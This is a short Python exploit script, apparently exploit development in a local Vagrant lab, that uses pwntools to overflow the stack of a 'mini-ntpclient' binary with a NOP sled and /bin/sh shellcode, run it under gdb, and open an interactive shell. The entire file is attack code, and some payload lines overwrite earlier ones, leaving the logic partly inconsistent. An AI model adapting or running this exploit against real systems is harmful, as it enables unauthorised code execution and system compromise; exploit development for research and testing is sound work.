0day_dev/exploit.py

from pwn import *
import base64

context.update(arch='i686', os='linux')

# Connect to the server with SSH
ssh_connection = ssh('vagrant', 'default', port=2222)

# Open a shell to write more stuff to
bash = ssh_connection.run('bash')



#crash_at = 0x107
crash_at = 264
#eip_crash = 0x61616663
eip_crash = 0x43424242
esp_location = pack(0xbffff600)
eip_crash_buffer = cyclic_find(eip_crash)



shellcode = shellcraft.sh()
nop_sled = asm('nop') * (crash_at - eip_crash_buffer - len(esp_location) - len(shellcode))
payload = b'A' * eip_crash_buffer + esp_location + nop_sled 


payload = cyclic(300) + esp_location  

print(shellcraft.sh())
#payload  = cyclic(eip_crash_buffer)
payload += asm(shellcode)

a = str()
for i in payload:
 a += "\\\\x%x" % i

bash.sendline('ulimit -c unlimited')
#bash.sendline('/vagrant/mini-ntpclient ' +  payload.hex() )
bash.sendline('gdb /vagrant/mini-ntpclient ' )
bash.sendline('run ' + str(a))
#bash.sendline('run ' + str(cyclic(crash_at)))

# Hand an interactive shell back to the user
bash.interactive()